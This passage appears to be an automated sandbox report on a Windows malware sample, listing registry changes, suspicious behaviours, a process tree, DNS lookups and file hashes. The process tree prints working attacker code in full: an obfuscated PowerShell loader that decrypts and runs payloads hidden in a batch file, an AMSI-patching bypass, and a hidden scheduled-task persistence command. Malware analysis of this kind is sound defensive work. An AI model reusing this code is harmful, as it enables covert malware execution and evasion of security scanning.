| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-89-91-53-4f-d9\WpadDecision = "0" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-89-91-53-4f-d9\WpadDecisionReason = "1" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-89-91-53-4f-d9 | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-89-91-53-4f-d9\WpadDecisionTime = 71918e1427bcda01 | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9ZSSIVseT17UszvdY4C5NHz76P6SG2gulfr28Vowtr0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iKcHjGMUp8jMw93DJpJszA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dvDwv=New-Object System.IO.MemoryStream(,$param_var); $bxxfa=New-Object System.IO.MemoryStream; $TRmaY=New-Object System.IO.Compression.GZipStream($dvDwv, [IO.Compression.CompressionMode]::Decompress); $TRmaY.CopyTo($bxxfa); $TRmaY.Dispose(); $dvDwv.Dispose(); $bxxfa.Dispose(); $bxxfa.ToArray();}function execute_function($param_var,$param2_var){ $NYMID=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tqTZr=$NYMID.EntryPoint; $tqTZr.Invoke($null, $param2_var);}$lgaaF = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$host.UI.RawUI.WindowTitle = $lgaaF;$MAhJa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lgaaF).Split([Environment]::NewLine);foreach ($fpybs in $MAhJa) { if ($fpybs.StartsWith('YDeMGzpSIOGZpUFjRNFm')) { $QCmKM=$fpybs.Substring(20); break; }}$payloads_var=[string[]]$QCmKM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_746_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_746.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_746.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_746.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9ZSSIVseT17UszvdY4C5NHz76P6SG2gulfr28Vowtr0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iKcHjGMUp8jMw93DJpJszA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dvDwv=New-Object System.IO.MemoryStream(,$param_var); $bxxfa=New-Object System.IO.MemoryStream; $TRmaY=New-Object System.IO.Compression.GZipStream($dvDwv, [IO.Compression.CompressionMode]::Decompress); $TRmaY.CopyTo($bxxfa); $TRmaY.Dispose(); $dvDwv.Dispose(); $bxxfa.Dispose(); $bxxfa.ToArray();}function execute_function($param_var,$param2_var){ $NYMID=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tqTZr=$NYMID.EntryPoint; $tqTZr.Invoke($null, $param2_var);}$lgaaF = 'C:\Users\Admin\AppData\Roaming\Windows_Log_746.bat';$host.UI.RawUI.WindowTitle = $lgaaF;$MAhJa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lgaaF).Split([Environment]::NewLine);foreach ($fpybs in $MAhJa) { if ($fpybs.StartsWith('YDeMGzpSIOGZpUFjRNFm')) { $QCmKM=$fpybs.Substring(20); break; }}$payloads_var=[string[]]$QCmKM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:eGqSGZBGdVbv{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CAeflCpPTyWVIO,[Parameter(Position=1)][Type]$QvZruXksXF)$LmyQGPXNTGw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+'c'+[Char](116)+''+[Char](101)+'d'+'D'+''+'e'+''+[Char](108)+'e'+'g'+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+'m'+''+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+'e'+'Ty'+'p'+'e',''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+'led'+[Char](44)+''+'A'+'ns'+'i'+''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+','+''+[Char](65)+''+'u'+''+'t'+'o'+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$LmyQGPXNTGw.DefineConstructor('R'+'T'+'S'+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+'am'+'e'+','+[Char](72)+'ide'+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$CAeflCpPTyWVIO).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+'m'+'e'+','+[Char](77)+''+[Char](97)+''+'n'+'a'+'g'+''+'e'+''+[Char](100)+'');$LmyQGPXNTGw.DefineMethod('I'+'n'+''+[Char](118)+'o'+[Char](107)+''+'e'+'',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+'e'+'B'+'y'+[Char](83)+'i'+[Char](103)+',N'+'e'+''+[Char](119)+''+[Char](83)+''+[Char](108)+'ot,'+[Char](86)+
'i'+[Char](114)+''+[Char](116)+''+'u'+'al',$QvZruXksXF,$CAeflCpPTyWVIO).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+',M'+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+'e'+''+'d'+'');Write-Output $LmyQGPXNTGw.CreateType();}$UsahYRRySJuYU=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+''+[Char](116)+''+[Char](101)+'m'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'Wi'+[Char](110)+''+[Char](51)+''+'2'+'.U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+''+'e'+'Na'+'t'+''+'i'+''+[Char](118)+'e'+'M'+''+'e'+''+'t'+''+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$gyJpBvzNLaTuww=$UsahYRRySJuYU.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'Pr'+[Char](111)+''+[Char](99)+''+'A'+''+'d'+''+[Char](100)+'r'+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+','+'S'+''+[Char](116)+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qvOVvokablYnezmsqlh=eGqSGZBGdVbv @([String])([IntPtr]);$MkNymqhlJOcqZdIELOWyaQ=eGqSGZBGdVbv 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LfaUNdlJUrJ=$UsahYRRySJuYU.GetMethod('G'+[Char](101)+''+'t'+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+'leH'+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+'l'+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$KvXpWfAAaygwgc=$gyJpBvzNLaTuww.Invoke($Null,@([Object]$LfaUNdlJUrJ,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+'r'+''+[Char](97)+'r'+'y'+'A')));$ibJwPZxTwmaovywto=$gyJpBvzNLaTuww.Invoke($Null,@([Object]$LfaUNdlJUrJ,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'Pr'+'o'+''+[Char](116)+''+'e'+''+[Char](99)+''+[Char](116)+'')));$wCWqDtL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KvXpWfAAaygwgc,$qvOVvokablYnezmsqlh).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+'dl'+[Char](108)+'');$zrKshOyzdaAvuDYzN=$gyJpBvzNLaTuww.Invoke($Null,@([Object]$wCWqDtL,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+''+[Char](99)+''+'a'+''+'n'+''+'B'+''+[Char](117)+''+'f'+'f'+[Char](101)+''+[Char](114)+'')));$qmybuZqpoA=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ibJwPZxTwmaovywto,$MkNymqhlJOcqZdIELOWyaQ).Invoke($zrKshOyzdaAvuDYzN,[uint32]8,4,[ref]$qmybuZqpoA);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$zrKshOyzdaAvuDYzN,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ibJwPZxTwmaovywto,$MkNymqhlJOcqZdIELOWyaQ).Invoke($zrKshOyzdaAvuDYzN,[uint32]8,0x20,[ref]$qmybuZqpoA);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+'s'+[Char](120)+'rs'+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+''))
.EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{d5e71b24-33a9-4da2-a51b-7cacd215aa63}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | freegeoip.net | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 8.8.8.8:53 | runderscore00-63294.portmap.host | udp |
| IE | 52.111.236.22:443 | N/A | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pid0cumu.25u.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 5dc9a9599fb11ee70f9164d8fea15abf |
| SHA1 | 85faf41a206f3fa8b469609333558cf817df2cda |
| SHA256 | 3f033142ed64a5d1e1e19d11a710e22a32827e98922769497ed6bd6e452e44de |
| SHA512 | 499407006c53a5f8e5b2b00dab734613762e66a9080504ab50d21e4c8a32b75d7308ccaa0cecfbeb7058044448a40912715da1f02ec72994596d567b515dcfca |
C:\Users\Admin\AppData\Roaming\Windows_Log_746.vbs
| MD5 | 83f86558cd4f137ae64a4e6c382c09e3 |
| SHA1 | 325c8f6ef68cb33fa909819d8d5c05184c6f809b |
| SHA256 | 64cc98f0c50cc3861c0f7f6c0e19a35c8862d0b7ba9a7187d1c9b91a3dbac676 |
| SHA512 | 04ee5d79f4279fe1e2d621b121e8ce3c141d7b7315cfa454410bc51588f620282be5b1a2c4bfad5c71b5555325817ba8e8d8ec24e9d8006faff768419d56f23d |
C:\Users\Admin\AppData\Roaming\Windows_Log_746.bat
| MD5 | d4c582bb5890af020c110f2b1de1d9db |
| SHA1 | 04c25b115c7bdaced94746c4acf9b5245f064ea0 |
| SHA256 | d34225f65c10acac82f381cf0f4281b2bc691afb2b72a1331acee94ca10e5c1c |
